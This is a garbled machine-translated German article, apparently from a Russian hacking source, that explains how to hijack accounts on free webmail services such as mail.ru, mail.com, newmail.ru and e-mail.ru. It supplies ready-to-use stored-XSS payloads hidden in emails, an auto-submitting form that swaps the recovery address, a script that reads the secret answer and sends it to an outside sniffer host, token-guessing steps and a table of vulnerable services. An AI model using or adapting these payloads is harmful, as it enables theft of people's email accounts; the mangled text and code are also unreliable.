REVIEW OF VULNERABILITY kostenlosen E-Mail-Dienst

Wir werden weiterhin in Web-Mail zu engagieren. Ich habe einige Nachforschungen von verschiedenen Dienstleistungen für Einbruch- und präsentieren Ihnen die Ergebnisse. Angriff Technologie bleibt das gleiche: der Gegner einen Brief an die Adresse des JavaScript-Code gesendet, der ausgelöst wird, wenn Sie eine Nachricht öffnen, und alle Informationen in den Einstellungen Box zu ändern. Es besteht keine Notwendigkeit für jeden Server im Detail zu beschreiben, wie der Ansatz überall gleich ist, so dass hier ein paar Beispiele sind, und am Ende - Tabelle. In den meisten Fällen kann durch Hacking eine 100% berücksichtigt werden, mit einigen Annahmen: Der Anwender muss sicher sein, eine Web-basierte Schnittstelle zu verwenden, um die Buchstaben zu lesen, wenn Exploits zu schreiben, habe ich auf einer Standard-Plattform konzentriert, unter der Annahme, das heißt zunächst, dass der Benutzer nicht einige exotischen oder OS Browser-Implementierung mit behinderten JS.

WWW.MAIL.RU

Um Mail №1 in Russland beginnen. An dieser Stelle aufgrund der Übertragung von JavaScript und einem Entwickler Fehler, Hacker können dieses Feld tragen. Ich glaube, dass die Grundprinzipien sind wohlbekannt. Wie ein Passwort zu bekommen? 1 - nicht autorisierte Änderung es. Es wird nicht notwendig sein, zuvor installierten kennen. 2 - auf die Sicherheitsfrage zu ändern und den Dienst des Kampfes mit Amnesie verwenden. Auch nicht gehalten werden. 3 - Legen Sie Ihre E-Mail-Alternative, ihm ein neues, vom System generierte Passwort zu erhalten. Schalten Sie nicht aus, sind die letzten beiden der genannten Optionen in der gleichen Form und wird auch durch ein Passwort geschützt. Auch der Rest von geringerem Interesse Setup für uns (Name, Vorname, etc.) nicht mehr in der Lage sein, ohne zu ändern, das aktuelle Passwort eingeben. Scheinbar aus dem Optionen. Allerdings gibt es eine sekundäre Bedeutung, unauffälligen Stelle der Einstellungen "Kontaktinformationen" (ICQ, Website, Telefonnummer, Ort der Arbeit, Zeitzone, etc.). In diesem Abschnitt können Sie auch eine E-Mail-Kontakt angeben. Der Trick besteht darin, dass diese Registrierungsinformationen in einer alternativen Adresse geändert wird, aber eine, die in der Anwendung registriert ist, und Sie können jetzt das Passwort auf der Seife, mit der Erinnerungs-Service zu bekommen. Es ist ganz einfach. URL: http://win.mail.ru/cgi-bin/anketa?page=2&[email protected] Wahr GET - Methode die Einstellungen in der Box mail.ru ändern ist jetzt unmöglich zu machen, so dass ich im Detail die technische Seite des Problems zu beschreiben.

I. in die richtige Box mit einem Buchstabencode Bezug genommen , die direkt in den Körper des Nachrichtenrahmens erzeugt, mit Bezug auf unsere Website. Wenn möglich, muss das Skript ohne Benutzerinteraktion ausgelöst werden (klicken Sie auf, klicken Sie auf, bewegen Sie die Maus, um das Bild Laden, etc.):


 <Embed src = "Javascript: document.getElementById ( 'xxx') innerHTML- = '<iframe src = http: //yoursite.yourdomain.ru/yourscript.html> </ iframe>';. This.wav">
 <P id = "xxx">
Um sowie Tarnung vollständig die Effizienz des Skripts zu gewährleisten, verwandeln:
 <Embed src = "javascript :. Status = location; document.getElementById ( 'xxx') innerHTML- = '<iframe src = http: //yoursite.ru/yourscript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <P id = "xxx">
In dieser Form wird die Zeichencodes mit den Buchstaben im Namen des iframe und JavaScript-Elemente ersetzt, und Mailing das Skript sie nicht filtern. Der Leitungsstatus = Position; Es schafft Transparenz in der Statusleiste des lokalen URL, fremd, um einen einwandfreien flackern. Attribute Breite und Höhe, sondern als Rahmen und einbetten werden auf Null gesetzt, und sie unsichtbar zu machen.

II. Auf http://yoursite.ru Ressource Zählung mit einem HTML-Dokument Form die geänderten Daten an den Server zu senden mail.ru.

Inhalt yourscript.html:
 <Form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <Input type = "hidden" name = "page" value = "2"> <br>
 <Input type = "hidden" name = "E-Mail" value = "[email protected]"> <br>
 <Input type = "hidden" value = "Speichern" name = "Speichern"> <br>
 </ Form> <br>
 <Script> <br>
 document.anketa.submit (); <br>
 </ Script>
Hinweis: die Arbeit des clientseitigen Skripts in unveränderter Form garantieren nur für den IE; Formular wird auf einer separaten Seite befindet sich speziell auf "Entladen" den Brief.


WWW.MAIL.COM

Jetzt ein paar andere Sicherheitslücke auf http://mail.com Beispiel. Wenn Sie das Kennwort Erinnerung zu verwenden, dann zu erreichen, ist es einfach, die richtige Antwort auf Ihre geheime Frage eingeben (eins). So haben wir ein Ziel, diese Antwort zu bekommen. Dies ist leicht gemacht. Wenn ich auf die Mailbox Eigenschaften und prosmatrel Registrierungsinformationen ging, uidel dann, dass die Antwort auf die geheime Frage verstecken sich nicht, dass wir JavaScript verwenden, ermöglicht es seinen Wert zu betrachten.

Implementieren Sie ein Skript durch den Tag - Stil.
Die Web-Seite mit den Einstellungen: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
Textfeld Name mit einer geheimen Antwort: hint_a
Als Ergebnis um Ihre geheime Frage zu stehlen, müssen Sie die Einstellungen Seite aufrufen, die JavaScript - Lauf, den Wert document.profileform.hint_a.value zu bekommen, und es zusammen mit Sniffer - Umgebungsvariable Umgebung REQUEST_UR I. weitergeben

Bereit Option:
 <Style> @import url (javascript: document.getElementById ( 'out') innerHTML- = "<iframe src = http :. //mail01.mail.com/scripts/common/genprofile.cgi Name = 'Null'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php'; document.zero.location = path + str`> </ iframe>" ); </ style>
 <Span id = 'out'> </ span>
Im generierten Rahmen genannt Nulllast - Einstellungen Seite. Nach dem Download läuft der OnLoad Handler ein Skript geheime Frage zu lesen, und dann durch den gleichen Rahmen, sendet eine Antwort an den Sniffer. Nun gehen Sie nur an die Adresse http://zero.h12.ru/stat/log.php, und finden Sie die richtigen Informationen in der "Host" Linie.

WWW.NEWMAIL.RU

Meiner Meinung nach, sehr beliebt Mailer, so ausführlich darüber sprechen. Vor allem, weil jemand anderes Konto zu übernehmen, auf es viel einfacher, als es auf den ersten Blick scheint. Sie können dies tun: einen Brief mit einem Skript senden , die, wenn sie ausgeführt wird eine Session - ID erhalten, die erforderlichen Untersuchungen bilden, und die Einstellungen Werte altrenativnogo E - Mail ersetzen (die dann das Kennwort senden) und eine geheime Frage und Antwort. Wenn jedoch die Erinnerung, um anzuzeigen, andere Adresse, Passwort, und senden Sie es, solange die geheime Antwort richtig war. Und die folgende Beobachtung: Session - ID - Einstellungen zu ändern, können Sie gar nicht. Plus alle Tags erlaubt. Alle der oben genannten reduziert die Codemenge, um ein paar Zeilen:
 <Iframe src = http :? //newmail.ru/users/chpass.dhtml Cp_msg = 1 & cp_quest = FRAGE & cp_answ = ANTWORT width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

Hacking-Methode e-mail.ru einige nicht in das allgemeine Thema des Artikels passen, aber immer noch - Mail :) . Wenn ich brauchte ein Passwort aus einem Feld zu erhalten, registriert ich in der Regel ein Benutzerkonto, und begann das System zu erkunden. Das erste, was mir auffiel - eine Gelegenheit, ein neues Passwort und Sicherheitsfrage ohne Eingabe des alten Passworts zu beantworten einzustellen. Aktionsplan üblich: Check-ID-Filter-Tags zu empfangen und die Abfrage auszuführen. Allerdings sind die Einstellungen für spezielle Variable utoken verwendet ändern, die in dem Dokument Körper enthalten ist. Nach der Änderung von Frage und Antwort mit bekannten utoken experimentieren:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&[email protected]&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ kam ich zu dem Schluss , dass für die Änderung von Einstellungen der ID und Cookies ist nicht erforderlich. Nachdem jedoch die Beobachtung utoken wurde festgestellt , dass die vierstellige Hexadezimalzahl nach [email protected] Adresse in einem sehr engen Bereich liegt. Das heißt, eine geheime Frage herzustellen , um ein Feld zu uns auf Zinsen zu beantworten, müssen Sie durch alle 7 Optionen zu gehen: 5a00, 5b00, 5c00, 5d00 , 5e00, 5f00, 6000. Wenn die Zahl erraten wird, erhalten wir auf die gewünschte Box.

Hinweis: Zu diesem Zeitpunkt einige Änderungen gab. Passwort-Recovery-Dienst wird nicht ausgeführt, so ist es ratsam, sie sofort zu ändern. Adresse ändern Sie die Einstellung hat sich geändert:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&[email protected]&[email protected]&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Methode funktioniert nevsegda. Wahrscheinlich bedarf noch der Benutzer von Zeit zu Zeit in der E - Mail über das Internet kam.

Die Tabelle mit den Eigenschaften der freien WWW-Servern

SERVER JavaScript VULNERABILITY
www.km.ru
km.ru
img src = javascript: Es ermöglicht Ihnen, das Passwort von der Seite Einstellungen des Passwort-Feld zu lesen
www.mail.ru
inbox.ru , bk.ru , list.ru ,
embed src = javascript: Sie können die alternative E-Mail ändern
www.mail.com
email.com , post.com , myself.com , consultant.com und andere.
@ Import URL (Javascript :); Die Einstellungen werden in Antwort auf die geheime Frage gezeigt
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
mit allen Mitteln Lesen / ändern Sie die Frage und Antwort. Kennwort herausragende Leistungen
www.netman.ru und www.mailgate.ru
die gleiche Mailer. 80 Domains
img src = javascript :, style = background: url (Javascript :) Sie können die Antwort auf Ihre geheime Frage zu stehlen, wenn es installiert ist. Es ist auch möglich ustnovit Nachsendeadresse (eine Kopie wird nicht gespeichert)
www.yandex.ru OnError, OnLoad Entfernen des Standort * .narod.ru (JS nicht erforderlich)
www.ukr.net embed src = javasc
ript: diese .wav>
Lesen Sie die Antwort auf Ihre geheime Frage
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Ändern / stehlen die geheime Antwort
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru und andere.
Vielfach Löschen Ihres Kontos
www.rin.ru embed src = javascript: Lesen Sie die geheime Antwort